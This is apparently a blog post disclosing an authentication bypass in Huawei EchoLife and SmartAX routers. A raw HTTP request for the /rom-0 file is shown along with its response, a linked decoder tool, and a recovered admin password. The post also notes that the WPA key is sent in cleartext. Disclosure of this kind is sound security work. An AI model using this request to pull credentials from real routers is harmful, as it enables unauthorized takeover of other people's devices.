Huawei Routers Multiple Vulnerabilities

The Huawei EchoLife HG520c router (Shodan search) contains a way to bypass authentication. If you request the /rom-0 file it does not require authentication. This can be reversed using available tools like the one at http://50.57.229.26/zynos.php. The first string returned is the admin password. I tested the following firmware version: 3.10.33.0-1.0.7.0. This also affects the Huawei SmartAX MT880 (Shodan search) running firmware 3.11.2.142, and the MT886 running 3.12.8.20. This is due to use of RomPager as the underlying server.

GET /rom-0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Fri, 07 Jan 2000 06:11:11 GMT
Last-Modified: Tue, 07 Jan 1930 06:11:11 GMT
Content-Length: 16384
Server: RomPager/4.07 UPnP/1.0
EXT:

[…]

echolife1

Also the /home_wlan.html page will send the cleartext WPA shared key over HTTP.

Advertisements

Tags: , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: